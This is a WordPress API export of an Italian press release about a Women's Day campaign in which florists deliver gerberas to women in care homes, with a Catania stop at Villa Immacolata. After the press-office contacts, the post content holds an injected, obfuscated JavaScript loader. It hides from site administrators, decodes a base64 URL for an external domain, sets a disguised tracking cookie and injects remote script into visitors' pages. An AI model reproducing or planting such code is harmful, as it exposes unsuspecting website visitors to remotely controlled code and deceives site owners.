{"id":49717,"date":"2024-03-06T19:53:24","date_gmt":"2024-03-06T19:53:24","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=49717"},"modified":"2026-02-24T22:39:23","modified_gmt":"2026-02-24T22:39:23","slug":"8-marzo-un-fiore-di-gratitudine-alle-donne-nelle-rsa","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2024\/03\/06\/8-marzo-un-fiore-di-gratitudine-alle-donne-nelle-rsa\/","title":{"rendered":"8 marzo: \u201cUn fiore di gratitudine\u201d alle donne nelle RSA"},"content":{"rendered":"<p><strong>Unione Induista Italiana e FederFiori nuovamente insieme l\u20198 marzo per rinnovare gratitudine e vicinanza verso le ospiti delle \u201cResidenze Sanitarie Assistite\u201d<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>ROMA\/CATANIA, 6 marzo 2024<\/strong> \u2013 In occasione della Festa della Donna del prossimo 8 marzo, <strong>l&#8217;Unione Induista Italiana,<\/strong> in collaborazione con <strong>FederFiori-Confcommercio<\/strong>, rilancia con gioia la ormai tradizionale campagna &#8220;<strong>8 marzo, fiori per le donne delle RSA<\/strong>&#8220;. Un&#8217;iniziativa che si propone di portare un sorriso alle donne \u2013 spesso anziane e sole &#8211; ospitate nelle RSA e che anche quest\u2019anno avr\u00e0 una tappa a <strong>Catania<\/strong>, grazie all\u2019impegno di <strong>Rosario Alfino<\/strong>, fiorista catanese e presidente di FederFiori-Confcommercio.<\/p>\n<p><strong>A ricevere la mattina dell\u20198 marzo l\u2019omaggio floreale dell\u2019Unione Induista italiana, a Catania, saranno le 30 ospiti della Casa di Riposo Villa Immacolata (zona San Nullo, via Claudio Arezzo 2\/D, 95122).<\/strong><\/p>\n<p>\u00ab<em>\u00c8 un vero piacere rinnovare la collaborazione con l&#8217;Unione Induista Italiana e riproporre questa iniziativa che coinvolger\u00e0 centinaia di fioristi in tutta Italia<\/em> &#8211; dichiara <strong>Rosario Alfino<\/strong>, Presidente di FederFiori-Confcommercio -. <em>Questo piccolo gesto di solidariet\u00e0, il dono di un fiore e di un sorriso, vuole esprimere vicinanza e affetto a persone che, troppo spesso, soffrono la solitudine. Siamo convinti che, anche attraverso un gesto cos\u00ec semplice, possiamo rigenerare il sorriso e portare un po&#8217; di luce nelle vite di chi ne ha pi\u00f9 bisogno\u00bb.<\/em><\/p>\n<p><img loading=\"lazy\" class=\"size-medium wp-image-49719 alignleft\" src=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa-300x200.jpg 300w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa-1024x682.jpg 1024w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa-768x512.jpg 768w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa-1536x1023.jpg 1536w, https:\/\/www.radioempire.it\/wp-content\/uploads\/2024\/03\/le-donne-in-rsa.jpg 1600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>\u00ab<em>Le persone anziane rappresentano la saggezza, la storia vissuta e il tessuto stesso delle nostre comunit\u00e0 &#8211; <\/em>afferma <strong>Svamini Hamsananda Ghiri<\/strong>, vice presidente Unione Induista Italiana<em> -. Il loro impegno, la loro dedizione e il loro amore hanno plasmato le fondamenta su cui poggiamo il nostro presente. Ogni giorno<\/em><em><span style=\"text-decoration: line-through;\">,<\/span><\/em> <em>con ci\u00f2 che hanno seminato ci regalano un esempio di resilienza, gentilezza e amore. Questa iniziativa che si rinnova \u00e8 un tributo al loro inestimabile dono di s\u00e9 stesse. La loro vicinanza, un legame con il passato che ci aiuta a navigare nel presente\u00bb.<\/em><\/p>\n<p>Il richiamo scelto per questa edizione \u00e8: <strong><em>&#8220;Un fiore di gratitudine<\/em><\/strong>\u201d, un momento di riconoscenza e gioia non solo per gli anziani che alloggiano nelle residenze sanitarie, ma anche per chi li assiste diventando spesso il loro nuovo nucleo familiare. In un periodo in cui il mondo rivede l\u2019atrocit\u00e0 delle guerre, le epidemie e la recrudescenza costante della violenza contro le donne, l&#8217;Unione Induista Italiana e FederFiori-Confcommercio ritengono fondamentale offrire, in una data altamente simbolica, un tangibile gesto di solidariet\u00e0.<\/p>\n<p>Saranno centinaia i fioristi a mobilitarsi in Italia, tra venerd\u00ec e sabato, per consegnare vasi di gerbere nelle RSA che hanno accettato di collaborare all\u2019evento; le gerbere sono accompagnate da messaggi augurali che si rinnovano in occasione della Festa della Donna.<\/p>\n<p><strong>Ufficio Stampa &#8211; Mot Consulting<\/strong><\/p>\n<p>Marco Mottolese<br \/>\n+39 3488704800<\/p>\n<p>Valeria Bonacci<br \/>\n+39 3472998817<\/p>\n<p>Giorgia Simonetta<\/p>\n<p>+39 3881421648<\/p>\n<p>Catania | Carmela Grasso 349 2684564<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Unione Induista Italiana e FederFiori nuovamente insieme l\u20198 marzo per rinnovare gratitudine e vicinanza verso le ospiti delle \u201cResidenze Sanitarie Assistite\u201d \u00a0ROMA\/CATANIA, 6 marzo 2024 \u2013 In occasione della Festa<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2024\/03\/06\/8-marzo-un-fiore-di-gratitudine-alle-donne-nelle-rsa\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":49718,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,36],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49717"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=49717"}],"version-history":[{"count":2,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49717\/revisions"}],"predecessor-version":[{"id":57378,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49717\/revisions\/57378"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/49718"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=49717"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=49717"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=49717"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}